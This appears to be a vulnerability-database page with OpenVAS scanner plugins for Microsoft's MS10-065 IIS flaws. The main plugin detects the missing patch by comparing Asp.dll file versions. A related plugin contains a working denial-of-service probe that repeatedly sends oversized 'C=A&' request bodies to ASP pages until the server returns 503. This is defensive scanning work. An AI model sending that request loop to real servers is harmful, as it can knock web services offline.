Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)
2010-09-15T00:00:00
ID OPENVAS:1361412562310901151 Type openvas Reporter Copyright (C) 2010 SecPod Modified 2020-04-23T00:00:00
Description
This host is missing a critical security update according to
Microsoft Bulletin MS10-065.
###############################################################################
# OpenVAS Vulnerability Test
#
# Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)
#
# Authors:
# Sooraj KS <kssooraj@secpod.com>
#
# Copyright:
# Copyright (C) 2010 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Metadata block: runs only when the scanner loads the plugin with
# `description` set. The exit(0) at its end returns before any of the host
# checks further down the file are reached.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.901151");
script_version("2020-04-23T12:22:09+0000");
script_tag(name:"last_modification", value:"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)");
script_tag(name:"creation_date", value:"2010-09-15 17:01:07 +0200 (Wed, 15 Sep 2010)");
# Three CVEs are reported together under one result; the "insight" tag below
# describes three separate flaws (ASP request handling, FastCGI header
# handling, URL-based authentication bypass).
script_cve_id("CVE-2010-1899", "CVE-2010-2730", "CVE-2010-2731");
script_bugtraq_id(43140, 43138, 41314);
# CVSS v2 base score and vector (AV/AC/Au notation).
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_name("Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)");
script_xref(name:"URL", value:"http://support.microsoft.com/kb/2124261");
script_xref(name:"URL", value:"http://www.vupen.com/english/advisories/2010/2386");
script_xref(name:"URL", value:"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065");
# ACT_GATHER_INFO: the plugin only collects information; the check code below
# reads knowledge-base entries and a file version and sends no crafted request
# to the web server.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2010 SecPod");
script_family("Windows : Microsoft Bulletins");
# The plugin is scheduled after these two scripts and is skipped unless both
# KB keys exist.
# NOTE(review): presumably "MS/IIS/Ver" comes from gb_ms_iis_detect_win.nasl and
# "SMB/registry_enumerated" from secpod_reg_enum.nasl, i.e. a working
# authenticated SMB session is needed - confirm against those scripts.
script_dependencies("secpod_reg_enum.nasl", "gb_ms_iis_detect_win.nasl");
script_mandatory_keys("MS/IIS/Ver", "SMB/registry_enumerated");
# 139/445 are the NetBIOS session and SMB ports used to reach the target.
script_require_ports(139, 445);
script_tag(name:"impact", value:"Successful exploitation could allow remote attackers to bypass restrictions,
create a denial of service condition or compromise a vulnerable web server.");
script_tag(name:"affected", value:"- Microsoft Windows 7
- Microsoft Windows XP Service Pack 3 and prior
- Microsoft Windows 2K3 Service Pack 2 and prior
- Microsoft Windows Vista Service Pack 2 and prior
- Microsoft Windows Server 2008 Service Pack 2 and prior
- Microsoft Internet Information Services (IIS) version 5.1
- Microsoft Internet Information Services (IIS) version 6.0
- Microsoft Internet Information Services (IIS) version 7.0
- Microsoft Internet Information Services (IIS) version 7.5");
script_tag(name:"insight", value:"- a stack overflow error in the ASP script processing code when processing
specially crafted URL requests sent to active server pages, which could be
exploited to cause a denial of service.
- a buffer overflow error in the FastCGI module when processing malformed
HTTP headers, which could be exploited by remote attackers to take complete
control of the affected system via a specially crafted request.
- an error when processing specially crafted URLs, which could be exploited
to bypass authentication.");
script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");
script_tag(name:"summary", value:"This host is missing a critical security update according to
Microsoft Bulletin MS10-065.");
# qod_type "registry": the finding is inferred from registry and file-version
# data on the host, not from exercising the flaw, so it is only as reliable as
# the credentialed read.
script_tag(name:"qod_type", value:"registry");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("smb_nt.inc");
include("secpod_reg.inc");
include("version_func.inc");
include("secpod_smb_func.inc");
# Preconditions. Every guard below ends the run with exit(0) and reports
# nothing, so a failed lookup (no credentials, unreadable share, missing file)
# produces no result for the host rather than a "not vulnerable" verdict.

# IIS must have been detected earlier in the scan.
iisVer = get_kb_item("MS/IIS/Ver");
if(!iisVer) exit(0);

# Continue only on the OS / service-pack levels this check knows about.
# NOTE(review): the numbers look like "first service pack that is out of scope"
# per OS (xp:4 covers SP3 and below) - confirm in secpod_reg.inc.
if(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0) exit(0);

# Stop when the hotfix is recorded as installed.
# NOTE(review): 2267960 is the number in the plugin title, while the KB linked
# from the plugin references is 2124261 - confirm this name matches what the
# registry enumeration stores; otherwise the file-version test below is the
# only effective check.
if(hotfix_missing(name:"2267960") == 0) exit(0);

sysPath = smb_get_systemroot();
if(!sysPath) exit(0);

# Asp.dll is the only binary inspected. The plugin text also describes a
# FastCGI flaw and an authentication bypass; when Asp.dll cannot be read the
# script exits here without a result.
# NOTE(review): confirm those components are covered by another check.
sysVer = fetch_file_version(sysPath:sysPath, file_name:"system32\inetsrv\Asp.dll");
if(!sysVer) exit(0);
# Select the patched Asp.dll build for the detected OS and service pack, then
# compare once. Two outcomes are possible:
#   fixedVer set     -> report only if the installed Asp.dll is older
#   belowKnownSP set -> the service pack is not one with a listed fixed build;
#                       the host is reported without a version comparison
fixedVer = NULL;
belowKnownSP = FALSE;

if(hotfix_check_sp(xp:4) > 0)
{
  # Windows XP: a fixed build is listed for SP3 only.
  spName = get_kb_item("SMB/WinXP/ServicePack");
  if("Service Pack 3" >< spName)
    fixedVer = "5.1.2600.6007";
  else
    belowKnownSP = TRUE;
}
else if(hotfix_check_sp(win2003:3) > 0)
{
  # Windows Server 2003: a fixed build is listed for SP2 only.
  spName = get_kb_item("SMB/Win2003/ServicePack");
  if("Service Pack 2" >< spName)
    fixedVer = "6.0.3790.4735";
  else
    belowKnownSP = TRUE;
}
else if(hotfix_check_sp(winVista:3, win2008:3) > 0)
{
  # Vista and Server 2008 share builds; use whichever service-pack key exists.
  spName = get_kb_item("SMB/WinVista/ServicePack");
  if(!spName)
    spName = get_kb_item("SMB/Win2008/ServicePack");

  if("Service Pack 1" >< spName)
    fixedVer = "7.0.6001.18497";
  else if("Service Pack 2" >< spName)
    fixedVer = "7.0.6002.18276";
  else
    belowKnownSP = TRUE;
}
else if(hotfix_check_sp(win7:1) > 0)
{
  # Windows 7: one fixed build, no service-pack distinction.
  fixedVer = "7.5.7600.16620";
}

if(!isnull(fixedVer))
{
  if(version_is_less(version:sysVer, test_version:fixedVer))
  {
    # install_path carries the system root that was queried, not the full
    # path of Asp.dll.
    report = report_fixed_ver(installed_version:sysVer, fixed_version:fixedVer, install_path:sysPath);
    security_message(port: 0, data: report);
  }
  exit(0);
}

if(belowKnownSP)
{
  # No version evidence is attached to this result; treat it as "service pack
  # level predates the listed fix" when triaging.
  security_message( port: 0, data: "The target host was found to be vulnerable" );
}
{"id": "OPENVAS:1361412562310901151", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-065.", "published": "2010-09-15T00:00:00", "modified": "2020-04-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901151", "reporter": "Copyright (C) 2010 SecPod", "references": ["http://support.microsoft.com/kb/2124261", "http://www.vupen.com/english/advisories/2010/2386", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065"], "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "lastseen": "2020-04-27T19:23:05", "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-260", "CPAI-2010-261", "CPAI-2010-262", "CPAI-2013-3631", "CPAI-2013-3648"]}, {"type": "cve", "idList": ["CVE-2010-1899", "CVE-2010-2730", "CVE-2010-2731"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/HTTP/IIS_AUTH_BYPASS", "MSF:AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS"]}, {"type": "mskb", "idList": ["KB2267960"]}, {"type": "nessus", "idList": ["IIS_7_PCI.NASL", "IIS_ALTERNATE_DATA_STREAM_AUTHENTICATION_BYPASS.NASL", "SMB_NT_MS10-065.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801520", "OPENVAS:801520", "OPENVAS:901151"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24752", "SECURITYVULNS:VULN:11145"]}, {"type": "seebug", "idList": ["SSV:20120", "SSV:20121", "SSV:20122"]}], "rev": 4}, "score": {"value": 7.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-261", "CPAI-2013-3631"]}, {"type": "cve", "idList": ["CVE-2010-1899", "CVE-2010-2730", "CVE-2010-2731"]}, {"type": "metasploit", "idList": 
["MSF:AUXILIARY/ADMIN/HTTP/IIS_AUTH_BYPASS", "MSF:AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS"]}, {"type": "nessus", "idList": ["IIS_7_PCI.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:801520"]}, {"type": "seebug", "idList": ["SSV:20122"]}]}, "exploitation": null, "vulnersScore": 7.6}, "pluginID": "1361412562310901151", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901151\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-09-15 17:01:07 +0200 (Wed, 15 Sep 2010)\");\n script_cve_id(\"CVE-2010-1899\", \"CVE-2010-2730\", \"CVE-2010-2731\");\n script_bugtraq_id(43140, 43138, 41314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2124261\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/2386\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"gb_ms_iis_detect_win.nasl\");\n script_mandatory_keys(\"MS/IIS/Ver\", \"SMB/registry_enumerated\");\n script_require_ports(139, 445);\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to bypass restrictions,\n create a denial of service condition or compromise a vulnerable web server.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2K3 Service Pack 2 and prior\n\n - 
Microsoft Windows Vista Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 2 and prior\n\n - Microsoft Internet Information Services (IIS) version 5.1\n\n - Microsoft Internet Information Services (IIS) version 6.0\n\n - Microsoft Internet Information Services (IIS) version 7.0\n\n - Microsoft Internet Information Services (IIS) version 7.5\");\n script_tag(name:\"insight\", value:\"- a stack overflow error in the ASP script processing code when processing\n specially crafted URL requests sent to active server pages, which could be\n exploited to cause a denial of service.\n\n - a buffer overflow error in the FastCGI module when processing malformed\n HTTP headers, which could be exploited by remote attackers to take complete\n control of the affected system via a specially crafted request.\n\n - an error when processing specially crafted URLs, which could be exploited\n to bypass authentication.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-065.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\niisVer = get_kb_item(\"MS/IIS/Ver\");\nif(!iisVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"2267960\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\inetsrv\\Asp.dll\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6007\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"5.1.2600.6007\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"6.0.3790.4735\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"6.0.3790.4735\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n 
if(version_is_less(version:sysVer, test_version:\"7.0.6001.18497\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"7.0.6001.18497\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"7.0.6002.18276\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"7.0.6002.18276\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"7.5.7600.16620\")){\n report = report_fixed_ver(installed_version:sysVer, fixed_version:\"7.5.7600.16620\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"openvas": [{"lastseen": "2017-07-24T12:49:01", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-065.", "cvss3": {}, "published": "2010-09-15T00:00:00", "type": "openvas", "title": "Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:901151", "href": "http://plugins.openvas.org/nasl.php?oid=901151", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-065.nasl 6605 2017-07-07 11:22:07Z cfischer $\n#\n# Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to bypass restrictions,\n create a denial of service condition or compromise a vulnerable web server.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Windows 7\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2K3 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 2 and prior.\n Microsoft Windows Server 2008 Service Pack 2 and prior.\n Microsoft Internet Information Services (IIS) version 5.1\n Microsoft Internet Information Services (IIS) version 6.0\n Microsoft Internet Information Services (IIS) version 7.0\n Microsoft Internet Information Services (IIS) version 7.5\";\ntag_insight = \"- a stack overflow error in the ASP script processing code when processing\n specially crafted URL requests sent to active server pages, which could be\n exploited to cause a denial of service.\n - a buffer overflow error in the FastCGI module when processing malformed\n HTTP headers, which could be exploited by remote attackers to take complete\n control of the affected system via a specially crafted request.\n - an error when processing specially crafted URLs, which could be exploited\n to bypass authentication.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/MS10-065\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-065.\";\n\nif(description)\n{\n script_id(901151);\n script_version(\"$Revision: 6605 
$\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 13:22:07 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-15 17:01:07 +0200 (Wed, 15 Sep 2010)\");\n script_cve_id(\"CVE-2010-1899\", \"CVE-2010-2730\", \"CVE-2010-2731\");\n script_bugtraq_id(43140, 43138, 41314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960)\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2124261\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/2386\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/MS10-065\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"gb_ms_iis_detect_win.nasl\");\n script_mandatory_keys(\"MS/IIS/Ver\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Confirm IIS\niisVer = get_kb_item(\"MS/IIS/Ver\");\nif(!iisVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\n## Hotfix check\nif(hotfix_missing(name:\"2267960\") == 0){\n exit(0);\n}\n\nsysPath = 
smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\inetsrv\\Asp.dll\");\nif(!sysVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Grep for Asp.dll version < 5.1.2600.6007\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6007\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Grep for Asp.dll version < 6.0.3790.4735\n if(version_is_less(version:sysVer, test_version:\"6.0.3790.4735\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n ## Grep for Asp.dll version < 7.0.6001.18497\n if(version_is_less(version:sysVer, test_version:\"7.0.6001.18497\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Grep for Asp.dll version < 7.0.6002.18276\n if(version_is_less(version:sysVer, test_version:\"7.0.6002.18276\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n ## Grep for Asp.dll version < 7.5.7600.16620\n if(version_is_less(version:sysVer, test_version:\"7.5.7600.16620\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-10T20:03:05", "description": "The host is running Microsoft IIS Webserver and is prone to\n stack based buffer overflow vulnerability.", "cvss3": {}, "published": "2010-10-08T00:00:00", "type": "openvas", "title": 
"Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2730"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310801520", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801520", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:iis\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801520\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-10-08 08:29:14 +0200 (Fri, 08 Oct 2010)\");\n script_bugtraq_id(43138);\n script_cve_id(\"CVE-2010-2730\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_ms_iis_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/installed\");\n\n script_xref(name:\"URL\", value:\"http://bug.zerobox.org/show-2780-1.html\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/15167/\");\n script_xref(name:\"URL\", value:\"http://www.deltadefensesystems.com/blog/?p=217\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-065\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote unauthenticated attackers to force\n the IIS server to become unresponsive until the IIS service is restarted manually by the administrator.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Information Services version 6.0.\");\n\n script_tag(name:\"insight\", value:\"The flaw is 
due to a stack overflow error in the in the IIS worker\n process which can be exploited using a crafted POST request to hosted 'ASP' pages.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"The host is running Microsoft IIS Webserver and is prone to\n stack based buffer overflow vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nforeach file( make_list( \"/login.asp\", \"/index.asp\", \"/default.asp\" ) ) {\n\n for( i = 0; i < 10; i++ ) {\n\n string = crap( data:\"C=A&\", length:160000 );\n\n req = string(\"HEAD \", file, \" HTTP/1.1 \\r\\n\",\n \"Host: \", get_host_name(), \"\\r\\n\",\n \"Connection:Close \\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded \\r\\n\",\n \"Content-Length:\", strlen(string),\"\\r\\n\\r\\n\", string);\n res = http_send_recv( port:port, data:req );\n\n if( ereg( pattern:\"^HTTP/1\\.[01] 503\", string:res ) &&\n ( \"Service Unavailable\" >< res ) ) {\n report = http_report_vuln_url( port:port, url:file );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:59", "description": "The host is running Microsoft IIS Webserver and is prone to\n stack based buffer overflow vulnerability.", "cvss3": {}, "published": "2010-10-08T00:00:00", "type": "openvas", "title": "Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2730"], "modified": "2017-02-17T00:00:00", "id": "OPENVAS:801520", "href": "http://plugins.openvas.org/nasl.php?oid=801520", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_iis_bof_vuln.nasl 5323 2017-02-17 08:49:23Z teissa $\n#\n# Microsoft IIS ASP Stack Based Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the remote unauthenticated attackers to force\n the IIS server to become unresponsive until the IIS service is restarted manually\n by the administrator.\n Impact Level: Application\";\ntag_affected = \"Microsoft Internet Information Services version 6.0\";\ntag_insight = \"The flaw is due to a stack overflow error in the in the IIS worker\n process which can be exploited using a crafted POST request to hosted 'ASP'\n pages.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/ms10-065.mspx\";\ntag_summary = \"The host is running Microsoft IIS Webserver and is prone to\n stack based buffer overflow 
